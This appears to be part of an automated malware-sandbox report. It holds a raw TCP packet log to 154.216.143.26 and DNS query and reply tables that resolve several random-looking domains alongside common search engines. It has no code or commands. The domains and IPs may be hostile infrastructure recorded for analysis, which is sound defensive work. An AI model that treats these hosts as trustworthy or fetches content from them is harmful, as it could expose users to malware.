                                          Jan 12, 2025 01:16:55.448415041 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.008717060 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.009001017 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.009035110 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.010185957 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.010523081 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.010533094 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.010705948 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.010718107 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.010737896 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.010792971 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.014363050 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.014434099 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.015513897 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.015647888 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.015661001 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.015734911 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.018778086 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.018982887 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.019006014 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.020133018 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.020426989 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.020529032 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.020591974 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.027394056 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.027659893 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.027697086 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.028727055 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.028786898 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.029439926 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.029495955 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.029558897 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.029567003 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.034893990 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.035130024 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.035161018 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.036197901 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.036262989 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.036598921 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.036648035 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.036716938 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.036725044 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.051359892 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.059830904 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.059866905 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.076493025 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.076517105 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.076534033 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.107242107 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.339071035 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.339355946 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.339378119 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.340461016 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.340531111 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.340936899 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.340996981 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.341114044 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.341125011 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.389866114 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.586128950 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.586227894 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.586302996 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.587522984 CET49744443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.587568045 CET44349744154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.587857008 CET49750443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.587918043 CET44349750154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.588094950 CET49750443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.588444948 CET49750443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.588463068 CET44349750154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.588543892 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.588629007 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.588696003 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.589445114 CET49747443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.589473963 CET44349747154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.593255043 CET49751443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.593293905 CET44349751154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.593425989 CET49751443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.593837976 CET49751443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.593852043 CET44349751154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610676050 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610707998 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610717058 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610794067 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.610794067 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610841990 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610868931 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.610882044 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.610922098 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.611797094 CET49746443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.611814976 CET44349746154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.612322092 CET49753443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.612353086 CET44349753154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.612447023 CET49753443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.612915039 CET49753443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.612941027 CET44349753154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.614444971 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.614552021 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.614614010 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.615097046 CET49748443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.615117073 CET44349748154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.822921991 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.822979927 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.822999001 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.823016882 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.823055983 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.823065042 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.823082924 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.823085070 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.823113918 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.823115110 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.823132038 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.823163986 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.824635029 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.824702024 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.824738026 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.824750900 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.824764013 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.867960930 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.913522959 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.913583994 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.913681984 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.913695097 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.913772106 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.913820028 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.913820028 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.915837049 CET49749443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.915859938 CET44349749154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.976599932 CET49754443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.976629019 CET44349754154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.976680994 CET49754443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.976865053 CET49755443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.976910114 CET44349755154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.977030993 CET49755443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977063894 CET49756443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977149010 CET44349756154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.977217913 CET49756443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977344990 CET49754443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977358103 CET44349754154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.977504015 CET49755443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977521896 CET44349755154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:56.977649927 CET49756443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:56.977684975 CET44349756154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.046555042 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.046582937 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.046629906 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.046681881 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.046737909 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.046761036 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.046885967 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.047164917 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047209024 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047240973 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.047257900 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047275066 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.047298908 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.047854900 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047900915 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047924995 CET49745443192.168.2.4154.216.143.26
                                          Jan 12, 2025 01:16:57.047939062 CET44349745154.216.143.26192.168.2.4
                                          Jan 12, 2025 01:16:57.047961950 CET49745443192.168.2.4154.216.143.26
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 12, 2025 01:16:49.669212103 CET192.168.2.41.1.1.10xf95fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:49.669416904 CET192.168.2.41.1.1.10x9539Standard query (0)www.google.com65IN (0x0001)false
                                          Jan 12, 2025 01:16:51.430994034 CET192.168.2.41.1.1.10xa62eStandard query (0)m.ccsurj.orgA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:51.431374073 CET192.168.2.41.1.1.10x4759Standard query (0)m.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:51.790558100 CET192.168.2.41.1.1.10x7669Standard query (0)m.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:52.760797024 CET192.168.2.41.1.1.10xf721Standard query (0)www.ccsurj.orgA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:52.760953903 CET192.168.2.41.1.1.10xdcc5Standard query (0)www.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:53.143275976 CET192.168.2.41.1.1.10x6748Standard query (0)www.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:56.617991924 CET192.168.2.41.1.1.10x3674Standard query (0)www.ccsurj.orgA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:56.618258953 CET192.168.2.41.1.1.10x7f14Standard query (0)www.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:56.967852116 CET192.168.2.41.1.1.10xeb84Standard query (0)www.ccsurj.org65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.114031076 CET192.168.2.41.1.1.10x3eb9Standard query (0)vkg.hpdbfezgrqwn.vipA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.114506006 CET192.168.2.41.1.1.10xceebStandard query (0)vkg.hpdbfezgrqwn.vip65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.120733023 CET192.168.2.41.1.1.10xdb53Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.121081114 CET192.168.2.41.1.1.10xe00fStandard query (0)www.baidu.com65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.122137070 CET192.168.2.41.1.1.10x2e51Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.122484922 CET192.168.2.41.1.1.10xc26Standard query (0)www.sogou.com65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.456686974 CET192.168.2.41.1.1.10x118dStandard query (0)vkg.hpdbfezgrqwn.vip65IN (0x0001)false
                                          Jan 12, 2025 01:16:59.822292089 CET192.168.2.41.1.1.10xab99Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:59.822432995 CET192.168.2.41.1.1.10x2accStandard query (0)www.baidu.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.071074009 CET192.168.2.41.1.1.10x8bb6Standard query (0)1k4ej4j1lxvjwz.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.071235895 CET192.168.2.41.1.1.10x2252Standard query (0)1k4ej4j1lxvjwz.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.098799944 CET192.168.2.41.1.1.10x2931Standard query (0)www.sogou.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.099097013 CET192.168.2.41.1.1.10xc91Standard query (0)www.sogou.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.100400925 CET192.168.2.41.1.1.10x4d23Standard query (0)vkg.hpdbfezgrqwn.vipA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.100637913 CET192.168.2.41.1.1.10xee68Standard query (0)vkg.hpdbfezgrqwn.vip65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.468772888 CET192.168.2.41.1.1.10x86a7Standard query (0)vkg.hpdbfezgrqwn.vip65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.631289005 CET192.168.2.41.1.1.10x6ba5Standard query (0)1k4ej4j1lxvjwz.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:03.611006021 CET192.168.2.41.1.1.10xaceaStandard query (0)p.ssl.qhimg.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:03.611519098 CET192.168.2.41.1.1.10x3a3aStandard query (0)p.ssl.qhimg.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:04.005439043 CET192.168.2.41.1.1.10x4504Standard query (0)1k4ej4j1lxvjwz.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:04.005633116 CET192.168.2.41.1.1.10x8690Standard query (0)1k4ej4j1lxvjwz.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:04.559838057 CET192.168.2.41.1.1.10xbf29Standard query (0)1k4ej4j1lxvjwz.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:04.820811033 CET192.168.2.41.1.1.10xb2a9Standard query (0)p.ssl.qhimg.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:04.821166039 CET192.168.2.41.1.1.10xf93aStandard query (0)p.ssl.qhimg.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:19.109246969 CET192.168.2.41.1.1.10xb191Standard query (0)551000l.ccA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:19.109318972 CET192.168.2.41.1.1.10xb476Standard query (0)551000l.cc65IN (0x0001)false
                                          Jan 12, 2025 01:17:21.325148106 CET192.168.2.41.1.1.10xb30bStandard query (0)p3yw7u.innittapp.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:21.325335026 CET192.168.2.41.1.1.10xab1Standard query (0)p3yw7u.innittapp.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:22.342653990 CET192.168.2.41.1.1.10x288dStandard query (0)p3yw7u.innittapp.com65IN (0x0001)false
                                          Jan 12, 2025 01:17:22.803033113 CET192.168.2.41.1.1.10x9773Standard query (0)551000l.ccA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.803162098 CET192.168.2.41.1.1.10x6657Standard query (0)551000l.cc65IN (0x0001)false
                                          Jan 12, 2025 01:17:25.268703938 CET192.168.2.41.1.1.10xba29Standard query (0)p3yw7u.innittapp.comA (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:25.268970966 CET192.168.2.41.1.1.10x39b7Standard query (0)p3yw7u.innittapp.com65IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 12, 2025 01:16:49.677568913 CET1.1.1.1192.168.2.40x9539No error (0)www.google.com65IN (0x0001)false
                                          Jan 12, 2025 01:16:49.677582979 CET1.1.1.1192.168.2.40xf95fNo error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:51.789931059 CET1.1.1.1192.168.2.40x4759Server failure (2)m.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:51.796756983 CET1.1.1.1192.168.2.40xa62eNo error (0)m.ccsurj.org154.216.143.26A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:52.153851032 CET1.1.1.1192.168.2.40x7669Server failure (2)m.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:53.096455097 CET1.1.1.1192.168.2.40xf721No error (0)www.ccsurj.org154.216.143.26A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:53.118592978 CET1.1.1.1192.168.2.40xdcc5Server failure (2)www.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:53.322606087 CET1.1.1.1192.168.2.40x6748Server failure (2)www.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:56.967459917 CET1.1.1.1192.168.2.40x7f14Server failure (2)www.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:56.976048946 CET1.1.1.1192.168.2.40x3674No error (0)www.ccsurj.org154.216.143.26A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:56.976268053 CET1.1.1.1192.168.2.40xeb84Server failure (2)www.ccsurj.orgnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.127439022 CET1.1.1.1192.168.2.40xdb53No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.127439022 CET1.1.1.1192.168.2.40xdb53No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.127439022 CET1.1.1.1192.168.2.40xdb53No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.127439022 CET1.1.1.1192.168.2.40xdb53No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.332911968 CET1.1.1.1192.168.2.40x2e51No error (0)www.sogou.com43.153.236.147A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.391472101 CET1.1.1.1192.168.2.40xe00fNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.391472101 CET1.1.1.1192.168.2.40xe00fNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.456022978 CET1.1.1.1192.168.2.40xceebServer failure (2)vkg.hpdbfezgrqwn.vipnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:58.466737986 CET1.1.1.1192.168.2.40x3eb9No error (0)vkg.hpdbfezgrqwn.vip122.10.26.202A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:58.809304953 CET1.1.1.1192.168.2.40x118dServer failure (2)vkg.hpdbfezgrqwn.vipnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:16:59.829654932 CET1.1.1.1192.168.2.40xab99No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:59.829654932 CET1.1.1.1192.168.2.40xab99No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:16:59.829654932 CET1.1.1.1192.168.2.40xab99No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:16:59.829654932 CET1.1.1.1192.168.2.40xab99No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.065265894 CET1.1.1.1192.168.2.40x2accNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.065265894 CET1.1.1.1192.168.2.40x2accNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.299709082 CET1.1.1.1192.168.2.40x2931No error (0)www.sogou.com43.153.236.147A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.436167002 CET1.1.1.1192.168.2.40x4d23No error (0)vkg.hpdbfezgrqwn.vip122.10.26.202A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.467917919 CET1.1.1.1192.168.2.40xee68Server failure (2)vkg.hpdbfezgrqwn.vipnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.630877018 CET1.1.1.1192.168.2.40x2252Server failure (2)1k4ej4j1lxvjwz.comnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:00.642981052 CET1.1.1.1192.168.2.40x8bb6No error (0)1k4ej4j1lxvjwz.com122.10.50.210A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:00.811374903 CET1.1.1.1192.168.2.40x86a7Server failure (2)vkg.hpdbfezgrqwn.vipnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:01.173033953 CET1.1.1.1192.168.2.40x6ba5Server failure (2)1k4ej4j1lxvjwz.comnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:03.815601110 CET1.1.1.1192.168.2.40xaceaNo error (0)p.ssl.qhimg.comd3h3opd4qa0dfk.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:03.815601110 CET1.1.1.1192.168.2.40xaceaNo error (0)d3h3opd4qa0dfk.cloudfront.net13.32.121.43A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:03.815601110 CET1.1.1.1192.168.2.40xaceaNo error (0)d3h3opd4qa0dfk.cloudfront.net13.32.121.84A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:03.815601110 CET1.1.1.1192.168.2.40xaceaNo error (0)d3h3opd4qa0dfk.cloudfront.net13.32.121.88A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:03.815601110 CET1.1.1.1192.168.2.40xaceaNo error (0)d3h3opd4qa0dfk.cloudfront.net13.32.121.52A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:04.558875084 CET1.1.1.1192.168.2.40x8690Server failure (2)1k4ej4j1lxvjwz.comnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:04.589389086 CET1.1.1.1192.168.2.40x4504No error (0)1k4ej4j1lxvjwz.com122.10.50.210A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.123018980 CET1.1.1.1192.168.2.40xbf29Server failure (2)1k4ej4j1lxvjwz.comnonenone65IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)p.ssl.qhimg.comp.ssl.qhimg.com.qh-cdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)p.ssl.qhimg.com.qh-cdn.com69d9dbca.cdn.ucloud.com.cnCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)69d9dbca.cdn.ucloud.com.cnuc-jn.ucloud.com.cn.ucnaming.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)uc-jn.ucloud.com.cn.ucnaming.comucloud-internal.v.ucnaming.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)ucloud-internal.v.ucnaming.com36.27.222.245A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:05.712322950 CET1.1.1.1192.168.2.40xb2a9No error (0)ucloud-internal.v.ucnaming.com36.27.222.246A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:19.121306896 CET1.1.1.1192.168.2.40xb191No error (0)551000l.cc154.193.113.233A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:19.121306896 CET1.1.1.1192.168.2.40xb191No error (0)551000l.cc154.193.113.232A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.297334909 CET1.1.1.1192.168.2.40xb30bNo error (0)p3yw7u.innittapp.comp3yw7u.innittapp.com.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.297334909 CET1.1.1.1192.168.2.40xb30bNo error (0)p3yw7u.innittapp.com.download.ks-cdn.coml5-global.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.297334909 CET1.1.1.1192.168.2.40xb30bNo error (0)l5-global.gslb.ksyuncdn.com103.198.200.7A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.297334909 CET1.1.1.1192.168.2.40xb30bNo error (0)l5-global.gslb.ksyuncdn.com103.155.16.134A (IP address)IN (0x0001)false
                                          Jan 12, 2025 01:17:22.406164885 CET1.1.1.1192.168.2.40xab1No error (0)p3yw7u.innittapp.comp3yw7u.innittapp.com.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
